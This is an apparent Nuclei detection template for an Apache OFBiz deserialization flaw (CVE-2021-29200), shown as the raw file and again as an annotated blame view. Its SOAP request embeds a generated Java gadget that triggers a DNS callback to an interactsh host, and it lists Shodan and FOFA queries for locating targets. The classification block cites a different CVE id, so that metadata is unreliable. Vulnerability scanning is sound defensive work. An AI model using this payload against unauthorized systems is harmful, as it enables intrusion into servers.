nuclei-templates/http/cves/2021/CVE-2021-29200.yaml

id: CVE-2021-29200

info:
  name: Apache OFBiz < 17.12.07 - Arbitrary Code Execution
  author: your3cho
  severity: critical
  description: |
    Apache OFBiz has unsafe deserialization prior to 17.12.07 version An unauthenticated user can perform an RCE attack
  reference:
    - http://www.openwall.com/lists/oss-security/2021/04/27/4
    - https://nvd.nist.gov/vuln/detail/CVE-2021-29200
    - https://github.com/freeide/CVE-2021-29200
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-49070
    cwe-id: CWE-502
    epss-score: 0.28884
    epss-percentile: 0.96427
    cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: apache
    product: ofbiz
    shodan-query: html:"OFBiz"
    fofa-query: app="Apache_OFBiz"
  tags: cve,cve2021,apache,ofbiz,deserialization,rce

http:
  - raw:
      - |
        POST /webtools/control/SOAPService HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
          <soapenv:Header/>
            <soapenv:Body>
              <ser>
                <map-HashMap>
                  <map-Entry>
                    <map-Key>
                      <cus-obj>{{generate_java_gadget("dns", "http://{{interactsh-url}}", "hex")}}</cus-obj>
                    </map-Key>
                    <map-Value>
                      <std-String value="STDSTRING"/>
                    </map-Value>
                  </map-Entry>
                </map-HashMap>
             </ser>
          </soapenv:Body>
        </soapenv:Envelope>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - 'value="responseMessage"'
# digest: 4b0a00483046022100c3d2477ff60df086f71beb857b1ccef8a9e439e710e735998dd9a9e4f2f47bb1022100da78034897719236ec60a1e82c0dfc4d35515e9c08c333a740836c82475b0d8e:922c64590222798bb761d5b6d8e72950
Create CVE-2021-29200.yaml 2023-12-15 12:18:56 +00:00			`id: CVE-2021-29200`

			`info:`
			`name: Apache OFBiz < 17.12.07 - Arbitrary Code Execution`
			`author: your3cho`
			`severity: critical`
			`description: \|`
metadata added 2023-12-19 01:54:17 +00:00			`Apache OFBiz has unsafe deserialization prior to 17.12.07 version An unauthenticated user can perform an RCE attack`
Create CVE-2021-29200.yaml 2023-12-15 12:18:56 +00:00			`reference:`
			`- http://www.openwall.com/lists/oss-security/2021/04/27/4`
			`- https://nvd.nist.gov/vuln/detail/CVE-2021-29200`
			`- https://github.com/freeide/CVE-2021-29200`
metadata added 2023-12-19 01:54:17 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
			`cve-id: CVE-2023-49070`
			`cwe-id: CWE-502`
			`epss-score: 0.28884`
			`epss-percentile: 0.96427`
			`cpe: cpe:2.3:a:apache:ofbiz::::::::`
Create CVE-2021-29200.yaml 2023-12-15 12:18:56 +00:00			`metadata:`
			`max-request: 1`
			`vendor: apache`
			`product: ofbiz`
			`shodan-query: html:"OFBiz"`
			`fofa-query: app="Apache_OFBiz"`
			`tags: cve,cve2021,apache,ofbiz,deserialization,rce`

			`http:`
			`- raw:`
			`- \|`
			`POST /webtools/control/SOAPService HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/xml`

			`<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">`
			`<soapenv:Header/>`
			`<soapenv:Body>`
			`<ser>`
			`<map-HashMap>`
			`<map-Entry>`
			`<map-Key>`
			`<cus-obj>{{generate_java_gadget("dns", "http://{{interactsh-url}}", "hex")}}</cus-obj>`
			`</map-Key>`
			`<map-Value>`
			`<std-String value="STDSTRING"/>`
			`</map-Value>`
			`</map-Entry>`
			`</map-HashMap>`
			`</ser>`
			`</soapenv:Body>`
			`</soapenv:Envelope>`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: interactsh_protocol`
			`words:`
			`- "dns"`

			`- type: word`
			`part: body`
			`words:`
			`- 'value="responseMessage"'`
Auto Template Signing [Wed Dec 20 05:06:17 UTC 2023] :robot: 2023-12-20 05:06:17 +00:00			`# digest: 4b0a00483046022100c3d2477ff60df086f71beb857b1ccef8a9e439e710e735998dd9a9e4f2f47bb1022100da78034897719236ec60a1e82c0dfc4d35515e9c08c333a740836c82475b0d8e:922c64590222798bb761d5b6d8e72950`